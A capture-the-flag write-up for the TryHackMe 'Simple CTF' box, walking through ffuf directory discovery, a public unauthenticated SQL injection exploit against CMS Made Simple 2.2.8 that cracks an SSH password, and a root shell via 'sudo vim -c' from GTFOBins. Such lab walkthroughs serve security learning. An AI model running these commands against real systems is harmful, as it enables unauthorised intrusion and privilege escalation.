✅TryHackMe - Simple CTF (Easy)

Summary

FFUF finds a /simple directory on port 80 which hosts CMS Made Simple 2.2.8. This service has an unauthenticated SQL injection exploit. The exploit finds a SSH credential for us and we can SSH in to get a user shell.

In the privilege escalation phase, we find we are able to run Vim as root from sudo -l. Use a payload from GTFOBins to get a root shell.

IP

• RHOST: 10.10.74.168

• LHOST: 10.13.12.2

Nmap

Nmap

Asset Discovery

Run FFUF:

ffuf -u http://10.10.74.168/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.html,.txt -fc 400,401,403

FFUF finds /robots.txt and /simple:

FFUF

User Shell: CMS Made Simple 2.2.8 Unauthenticated SQL Injection

Version number is leaked on /simple:

CMS Made Simple version 2.2.8

Searchsploit:

Searchsploit

Install termcolor:

python2 -m pip install termcolor

Run the exploit:

$ ./sqli.py -u http://10.10.74.168/simple --crack -w /usr/share/wordlists/rockyou.txt

The exploit finds a credential mitch:secret:

Credential

SSH login as mitch:

ssh mitch@10.10.74.168 -p 2222

Now we have a user shell:

User shell

Privilege Escalation: GTFOBins

sudo -l:

sudo -l

Use the payload from GTFOBins:

$ sudo vim -c ':!/bin/sh'

Now we have a root shell:

root shell